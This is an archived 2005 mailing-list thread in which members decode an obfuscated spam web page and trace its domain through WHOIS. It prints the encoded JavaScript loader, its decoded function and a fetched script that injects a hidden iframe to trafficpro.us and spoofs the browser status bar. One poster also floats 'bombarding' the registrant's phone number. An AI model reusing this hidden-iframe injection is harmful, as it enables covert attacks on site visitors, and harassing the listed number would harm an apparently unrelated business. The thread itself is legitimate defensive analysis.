Re: decyphering spam
It seems this spam leads to trafficpro.us which is registered by
somebody in UK (see below) - do you think it's worth reporting or taking
legal action? I guess we could just bombard their phone number
[EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less
Domain Name: TRAFFICPRO.US
Domain ID: D7444563-US
Sponsoring Registrar:SCHLUND + PARTNER AG
Domain Status: ok
Registrant ID: SPAG-4476
Registrant Name: Julie Prescott
Registrant Address1: Orchard Terrace
Registrant Address2: 8
Registrant City: York
Registrant Postal Code: YO51 9AF
Registrant Country: Great Britain (UK)
Registrant Country Code: GB
Registrant Phone Number: +44.1614315155
Registrant Email:[EMAIL PROTECTED]
Registrant Application Purpose: P1
Registrant Nexus Category: C11
Administrative Contact ID: SPAG-4476
Administrative Contact Name: Julie Prescott
Administrative Contact Address1: Orchard Terrace
Administrative Contact Address2: 8
Administrative Contact City: York
Administrative Contact Postal Code: YO51 9AF
Administrative Contact Country: Great Britain (UK)
Administrative Contact Country Code: GB
Administrative Contact Phone Number: +44.1614315155
{etc}
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
michael wrote:
It seems this spam leads to trafficpro.us which is registered by
somebody in UK (see below) - do you think it's worth reporting or taking
legal action? I guess we could just bombard their phone number
Or perhaps do a little research first?
The registrant claims to be in York.
The phone number is nowhere near York. It apparently belongs to a
company in Stockport called Railweight
http://www.touchstockport.com/business/list/bid/2964798
The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace.
http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000
Cheers, Dave
[EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less
Domain Name: TRAFFICPRO.US
Domain ID: D7444563-US
Sponsoring Registrar:SCHLUND + PARTNER AG
Domain Status: ok
Registrant ID: SPAG-4476
Registrant Name: Julie Prescott
Registrant Address1: Orchard Terrace
Registrant Address2: 8
Registrant City: York
Registrant Postal Code: YO51 9AF
Registrant Country: Great Britain (UK)
Registrant Country Code: GB
Registrant Phone Number: +44.1614315155
Registrant Email:[EMAIL PROTECTED]
Registrant Application Purpose: P1
Registrant Nexus Category: C11
Administrative Contact ID: SPAG-4476
Administrative Contact Name: Julie Prescott
Administrative Contact Address1: Orchard Terrace
Administrative Contact Address2: 8
Administrative Contact City: York
Administrative Contact Postal Code: YO51 9AF
Administrative Contact Country: Great Britain (UK)
Administrative Contact Country Code: GB
Administrative Contact Phone Number: +44.1614315155
{etc}
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote: michael wrote: It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number Or perhaps do a little research first? The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight http://www.touchstockport.com/business/list/bid/2964798 The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace. http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000 I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping! I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On Friday 03 June 2005 10:19, michael wrote: On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote: michael wrote: It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number Or perhaps do a little research first? The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight http://www.touchstockport.com/business/list/bid/2964798 The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace. http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750wi dth=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr 1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovty pe=zm=0in.x=6in.y=11scale=5000 I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping! I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed? Nominet are not responsible for .us, only .uk. The registrar seems to be someone in Germany. David -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
decyphering spam
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
html
head
body bgcolor=#080C25
script language=javascriptdocument.write(unescape('%3C%53%43%52%49%50%
54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%
64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27%
29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%
6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%
73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%
20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%
65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%
43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%
29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%
29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%
65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%
3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script
/body
/html
--
Michael Bane
Atmospheric Physics Group
University of Manchester
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
michael wrote:
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
Personally, I used Python's urllib.unquote and got the following:
SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript
language=javascriptfunction dF(s){var s1=unescape(s.substr(0,s.length-1));
var
t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script
dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script
Which is then fed the above segment to decode. Don't feel like digging
into the above javascript to make a Python equivolant decoder for that
section. Maybe someone else will jump in? :D
--
Steve C. Lamb | I'm your priest, I'm your shrink, I'm your
PGP Key: 8B6E99C5 | main connection to the switchboard of souls.
---+-
signature.asc
Description: OpenPGP digital signature
Re: decyphering spam
On Thu, 02 Jun 2005 21:18:47 +0100
michael [EMAIL PROTECTED] wrote:
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
html
head
body bgcolor=#080C25
script language=javascriptdocument.write(unescape('%3C%53%43%52%49%50%
54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%
64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27%
29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%
61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%
6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%
73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%
20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%
65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%
43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%
29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%
29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%
65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%
3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script
Each of the %xy groups is a % followed by a byte described in
hexadecimal. A little Perl or Python script should be able to
decipher it for you pretty quick.
--
-
Ron Johnson, Jr.
Jefferson, LA USA
PGP Key ID 8834C06B I prefer encrypted mail.
Observe good faith and justice toward all nations. Cultivate
peace and harmony with all.
George Washington
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
michael wrote:
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
Personally, I used Python's urllib.unquote and got the following:
SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript
language=javascriptfunction dF(s){var s1=unescape(s.substr(0,s.length-1));
var
t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script
dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script
Which is then fed the above segment to decode. Don't feel like digging
into the above javascript to make a Python equivolant decoder for that
section. Maybe someone else will jump in? :D
That final segment decodes to this:
SCRIPT LANGUAGE=javascript SRC=foto.js // SAMPLE SCRIPT #2 -
CALLING AN EXTERNAL JS FILE /SCRIPT
which, unless there was a base reference issued in the actual spam,
leads nowhere. :)
--
~ Darryl ~ [EMAIL PROTECTED]
http://smartssa.com / http://darrylclarke.com
Re: decyphering spam
On Thursday June 2 2005 22:18, michael wrote:
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
First, you shove it through that Perl script with the line intact (isn't
downloading Videos from secure pages fun...):
#!/usr/bin/perl -w
use strict;
foreach (STDIN) {
s/\%([0-9a-fA-F]{1,2})/print STDOUT chr(hex($1))/ge;
}
Afterwards, you search the resulting JavaScript fragment for what the dF
function actually does. It decodes to this:
SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPT
script language=javascript
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t= '';
for(i=0;is1.length;i++)
t += String.fromCharCode(
s1.charCodeAt(i)-s.substr(s.length-1,1) );
document.write(unescape(t));}
/script{]
Have fun. I found that it's actually pretty simple to just re-implement
whatever it does in a programming language of your choice and just dump
everything to stdout.
--
Got Backup?
Jabber: Shadowdancer at jabber.fsinf.de
pgp8iuOCMYIkQ.pgp
Description: PGP signature
Re: decyphering spam
On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote:
On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote:
michael wrote:
how do i decypher what the following HTML/javascript attempts (original
'write' was all one line)?
Personally, I used Python's urllib.unquote and got the following:
SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript
language=javascriptfunction dF(s){var
s1=unescape(s.substr(0,s.length-1));
var
t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script
dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script
Which is then fed the above segment to decode. Don't feel like digging
into the above javascript to make a Python equivolant decoder for that
section. Maybe someone else will jump in? :D
That final segment decodes to this:
SCRIPT LANGUAGE=javascript SRC=foto.js // SAMPLE SCRIPT #2 -
CALLING AN EXTERNAL JS FILE /SCRIPT
which, unless there was a base reference issued in the actual spam,
leads nowhere. :)
well i can 'wget' the foto.js from the site which is (if anybody is
interested!) a bit too simple to decode but those up for the challenge
could decypher the index.php
url = http://www.trafficpro.us/index.php;;
qwe = ' di'+'spl'+'ay:n'+'one'+';}/s'+'ty'+'le';
rty = ' FR'+'AMEB'+'ORD'+'ER=0 WIDTH=1 HEIGHT=1'+'0%
/I'+'F'+'RA'+'ME';
uio = 's'+'tyl'+'e type=text/css';
asd = 'IF'+'RA'+'ME SRC=';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval(window.status='google.com',7);
--
~ Darryl ~ [EMAIL PROTECTED]
http://smartssa.com / http://darrylclarke.com
--
Michael Bane
Atmospheric Physics Group
University of Manchester
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
